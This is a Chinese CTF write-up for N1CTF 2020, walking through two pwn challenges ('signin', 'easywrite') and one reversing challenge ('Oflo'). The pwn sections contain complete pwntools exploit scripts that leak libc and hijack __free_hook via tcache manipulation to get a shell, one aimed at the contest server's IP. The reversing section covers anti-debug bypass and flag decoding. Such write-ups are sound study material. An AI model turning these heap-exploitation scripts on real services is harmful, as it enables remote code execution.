N1CTF2020

N1CTF Pwn&Re部分

拖了好久的wp，差点咕咕咕了⏰

sigin

这题我开始的思路错了，先去劫持tecache_struct泄露，之后打free_hook的时候也是改的tecache_struct，由于tecache_struct和我们申请的heap之间还有一个0x1010的堆，导致后面再去调整cur指针时疯狂循环dele大概0x2000多次🤦，本地通了，远程GG，所以后面换了种解法0.0

先分析程序逻辑，C++写的菜单题，使用了vector来存储我们的数据，我们可以拥有两个vector。

数据结构为：

struct con{
  void *begin;
  void *cur;
  void *end;
}

当cur==end时vector会进行扩容的操作，先申请一个更大的堆，之后将数据copy过去，再将旧堆free。扩容大小依次为0x20,0x20,0x30,0x50,0x90,0x110,0x210,0x410,0x810,0x1010(就堆的大小而言)

漏洞在于dele时只是将cur指针减小8，因此我们可以通过dele控制cur指针，配合add可任意地址写。

利用思路：
1.通过不断add使得扩容free的堆放入unsorted bin
2.dele控制cur指向unsortedbin->fd的地址，配合show泄露。
3.之后利用vecort扩容的规律0x20,0x20，先将在tecache的0x20位置的第一个bin1->fd写如__free_hook-8，之后vector2先拿出bin1。这里写入str(0x68732f6e69622f)(即’/bin/sh’)，之后add(2,str(libc.sym['system'])),由于扩容从而在free_hook-8写入’/bin/sh’同时劫持free_hook为system。

exp：

from pwn import *
context.log_level='debug'
context.arch='amd64'

def cmd(command):
    p.recvuntil(">>")
    p.sendline(str(command))

def add(idx,number):
    cmd(1)
    p.recvuntil(":")
    p.sendline(str(idx))
    p.recvuntil(":")
    p.sendline(number)

def dele(idx):
    cmd(2)
    p.recvuntil(":")
    p.sendline(str(idx))

def show(idx):
    cmd(3)
    p.recvuntil(":")
    p.sendline(str(idx))

def main(host,port=9990):
    global p
    if host:
        p=remote(host,port)

    else:
        p=process("./signin",env={"LD_PRELOAD":"/home/an9ela/glibc-all-in-one/libs/2.27-3ubuntu1.2_amd64/libc-2.27.so"})

    for i in range(258):
        add(1,'1')

    for i in range(0x206-3):
        dele(1)
    show(1)
    offset=0x3ebca0
    libc.address=int(p.recvuntil("\n"))-offset
    success("libc: "+hex(libc.address))
    for i in range(0x00010d):
        dele(1)
    add(1,str(libc.sym['__free_hook']-8))
    add(2,str(0x68732f6e69622f))
    add(2,str(libc.sym['system']))

    # add(1,'1234')
    # add(1,'1000')
    # # add(1,'1234')
    # add(1,'2222')
    # for i in range(6):
    #     dele(1)
    # show(1)
    # heap_addr=int(p.recvuntil("\n"))
    # success("heap: "+hex(heap_addr))

    # dele(1)
    # add(1,str(heap_addr-0x011e60))
    # add(2,'18446744073709551615')
    # add(2,'18446744073709551615')
    # for i in range(31):
    #     add(2,'1')
    # for i in range(0x220/8-2):
    #     dele(2)
    # show(2)
    # offset=0x3ebca0
    # libc.address=int(p.recvuntil("\n"))-offset
    # success("libc: "+hex(libc.address))

    # for i in range(0x0023ee+4):
    #     dele(2)
    #     print"times:"+str(i)
    # add(2,str(libc.sym['__free_hook']-8))
    #
    # add(1,'0')
    # add(1,'0')
    # add(1,str(0x31))
    # one=0x4f3c2
    # realloc_hook=libc.symbols['__libc_realloc']
    #
    # binsh=0x68732f6e69622f
    # add(1,str(binsh))
    # add(1,str(libc.sym['system']))
    # for i in range(3):
    #     add(1,'0')    #注释的是第一种解法。


    # gdb.attach(p)
    p.interactive()

if __name__ == '__main__':
    libc=ELF("./libc.so")
    main("47.242.161.199")
    # main(0)

easywrite

这题学到新姿势了，ruan师傅几分钟打通tql。

程序逻辑很简单，给了我们libc地址，有一次往任意地址写入heap地址的机会，而且heap的内容可控，之后程序会申请0x30的堆存放留言，并在退出时free。

由于最后的这个0x30的堆malloc/free操作很可疑，最后应该就是要劫持free_hook，使得在free时触发。

没想到上题没用到tecache_struct，而这题用到了。libc中有个指针，指向tacache_struct，程序也是通过这个指针找到tecache_struct的位置的。

因此我们只要将这个指针指向内容可控的heap，就能伪造tecache_struct，并且在假struct中对应0x40大小bin的位置写入free_hook，那接下来的malloc(0x30)就会拿到free_hook，进而劫持free_hook:)

exp：

from pwn import *
context.log_level='debug'
context.arch='amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def main(host,port=1234):
    global p
    if host:
        p=remote(host,port)
    else:
        p=process("./easywrite")
    one=0xe6ce3
    debug(0x12BA)
    p.recvuntil("Here is your gift:")
    libc.address=int(p.recv(14),16)
    success("libc: "+hex(libc.address))
    p.recvuntil("Input your message:")
    payload = p64(0x100000000)
    payload = payload.ljust(0x90,b"\x00")
    payload += p64(libc.address+0x15fed8-0x10)
    p.send(payload)
    p.recvuntil("Where to write?:")

    p.send(p64(libc.address+0x1648a0))

    p.recvuntil("Any last message?:")
    p.send(b"/bin/sh\x00"+p64(0)+p64(libc.address-0x39840))

    # gdb.attach(p)
    p.interactive()

if __name__ == "__main__":
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    main(0)

Oflo

这题逆向很有意思🤳

先执行一下发现输出了linux版本并要求输入。

IDA打开发先main函数有花指令，先去花，之后配合动态调试发现程序在main_0有ptrace函数检查调试器，因此不能直接gdb，得attach上去调。

#ps -aux | grep oflo    获得进程号
#sudo gdb attach pid    attach pid

这样就可以了，动态调的过程中发现程序会将我们的输入的前5位和0x0400A6处的操作码xor,从而不断的修正该处的操作码（10次）

.text:0000000000400A69 byte_400A69     db 3Bh, 79h, 0EAh, 91h, 2Eh, 0EDh, 0DDh  ;是坏掉的

改之前
pwndbg> telescope 0x400a69
00:0000│ rsi  0x400a69 ◂— cmp    edi, dword ptr [rcx - 0x16] /* 0x23dded2e91ea793b */

改之后
pwndbg> telescope 0x400a69
00:0000│        0x400a69 ◂— push   rbp /* 0x40ec8348e5894855 */

之后程序会call 0x400a69，如过修正的不对的话程序就报错了，而我们发现使用的只是我们输入的前5个如果是flag的话那就是n1ctf，结果把0x400a69修正位push rbp，显然是正确的。

进入该函数后就是核心的逻辑的，值得注意的是：

  0x400a88    mov    byte ptr [rbp - 0x20], 0x35
  0x400a8c    mov    byte ptr [rbp - 0x1f], 0x2d
  0x400a90    mov    byte ptr [rbp - 0x1e], 0x11
  0x400a94    mov    byte ptr [rbp - 0x1d], 0x1a
► 0x400a98    mov    byte ptr [rbp - 0x1c], 0x49
  0x400a9c    mov    byte ptr [rbp - 0x1b], 0x7d
  0x400aa0    mov    byte ptr [rbp - 0x1a], 0x11
  0x400aa4    mov    byte ptr [rbp - 0x19], 0x14
  0x400aa8    mov    byte ptr [rbp - 0x18], 0x2b
  0x400aac    mov    byte ptr [rbp - 0x17], 0x3b
  0x400ab0    mov    byte ptr [rbp - 0x16], 0x3e
  0x400ab4    mov    byte ptr [rbp - 0x15], 0x3d
  0x400ab8    mov    byte ptr [rbp - 0x14], 0x3c
  0x400abc    mov    byte ptr [rbp - 0x13], 0x5f

显然是用来运算的数据，那么和谁进行运算呢？

往下调发现：

 RAX  0x35
 RBX  0x0
 RCX  0x7ffc117e8ee0 ◂— 'Linux version 5.4.0-52-generic (buildd@lcy01-amd64-022) (gcc version 7.5.0 (Ubuntu 7'
 RDX  0x7b
 RDI  0x7ffc117e8ee0 ◂— 'Linux version 5.4.0-52-generic (buildd@lcy01-amd64-022) (gcc version 7.5.0 (Ubuntu 7'
 RSI  0x0
 R8   0x17
 R9   0x7f2f29996d80 (initial) ◂— 0x0
 R10  0x0
 R11  0x206
 R12  0x4005c0 ◂— xor    ebp, ebp /* 0x89485ed18949ed31 */
 R13  0x7ffc117e91d0 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7ffc117e8ea0 —▸ 0x7ffc117e90f0 —▸ 0x400d30 ◂— push   r15 /* 0x41ff894156415741 */
 RSP  0x7ffc117e8e60 —▸ 0x7ffc117e8ec5 ◂— '{aaaaa}\n'
*RIP  0x400aff ◂— movzx  ecx, byte ptr [rcx] /* 0xc183c9be0f09b60f */
────────────────────────────────────[ DISASM ]─────────────────────────────────────
   0x400aef    movsx  edx, dl
   0x400af2    mov    ecx, dword ptr [rbp - 0x24]
   0x400af5    movsxd rsi, ecx
   0x400af8    mov    rcx, qword ptr [rbp - 0x38]
   0x400afc    add    rcx, rsi
 ► 0x400aff    movzx  ecx, byte ptr [rcx]
   0x400b02    movsx  ecx, cl
   0x400b05    add    ecx, 2
   0x400b08    xor    edx, ecx
   0x400b0a    cmp    eax, edx

多循环几次就会发现是和’Linux version ‘各个字符的ord()+2进行xor，进而写出脚本：

data=[0x35,0x2d,0x11,0x1a,0x49,0x7d,0x11,0x14,0x2b,0x3b,0x3e,0x3d,0x3c,0x5f]
code='Linux version '
code=list(code)
flag='n1ctf'
for i in range(len(code)):
    flag+=chr((ord(code[i])+2)^(data[i]))
print(flag)

前面修正机器码的部分调了好久才明白🛌

赏

谢谢你请我吃糖果